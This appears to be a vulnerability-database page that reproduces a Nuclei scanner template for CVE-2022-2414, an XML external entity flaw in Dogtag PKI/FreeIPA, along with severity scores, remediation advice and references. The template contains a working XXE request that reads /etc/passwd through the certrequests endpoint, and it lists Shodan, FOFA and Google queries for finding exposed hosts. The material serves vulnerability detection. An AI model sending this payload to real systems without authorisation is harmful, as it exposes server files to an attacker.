FreeIPA - XML Entity Injection

2023-08-0509:56:39

ProjectDiscovery

github.com

cve

cve2022

dogtag

freeipa

xxe

dogtagpki

xml

injection

security

http

remediation

entity

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.4 High

AI Score

Confidence

High

0.039 Low

EPSS

Percentile

92.0%

JSON

Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests.

id: CVE-2022-2414

info:
  name: FreeIPA - XML Entity Injection
  author: DhiyaneshDk
  severity: high
  description: |
    Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the server.
  remediation: |
    Apply the latest security patches and updates provided by the vendor to fix the XML Entity Injection vulnerability in FreeIPA.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/Dogtag/Dogtag%20PKI%20XML%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2022-2414.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2414
    - https://github.com/dogtagpki/pki/pull/4021
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-2414
    cwe-id: CWE-611
    epss-score: 0.01256
    epss-percentile: 0.84092
    cpe: cpe:2.3:a:dogtagpki:dogtagpki:10.5.18:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: dogtagpki
    product: dogtagpki
    shodan-query:
      - title:"Identity Management" html:"FreeIPA"
      - http.title:"identity management" html:"freeipa"
    fofa-query:
      - title="Identity Management"
      - title="identity management"
      - title="identity management" html:"freeipa"
    google-query: intitle:"identity management" html:"freeipa"
  tags: cve,cve2022,dogtag,freeipa,xxe,dogtagpki

http:
  - raw:
      - |
        POST /ca/rest/certrequests HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <!--?xml version="1.0" ?-->
        <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
        <CertEnrollmentRequest>
          <Attributes/>
          <ProfileID>&ent;</ProfileID>
        </CertEnrollmentRequest>

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: body
        words:
          - "PKIException"

      - type: word
        part: header
        words:
          - "application/xml"

      - type: status
        status:
          - 400
# digest: 4a0a0047304502202e7ffe2984dc1d2a2a3b9f295743656980d146a512bebd2f660485641430f47a022100de7db647d6adc79aa3d8285c0fd9c6034f7eda696a613a144fd601578c83689f:922c64590222798bb761d5b6d8e72950

References

github.com/dogtagpki/pki/pull/4021

github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/Dogtag/Dogtag%20PKI%20XML%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2022-2414.md

nvd.nist.gov/vuln/detail/CVE-2022-2414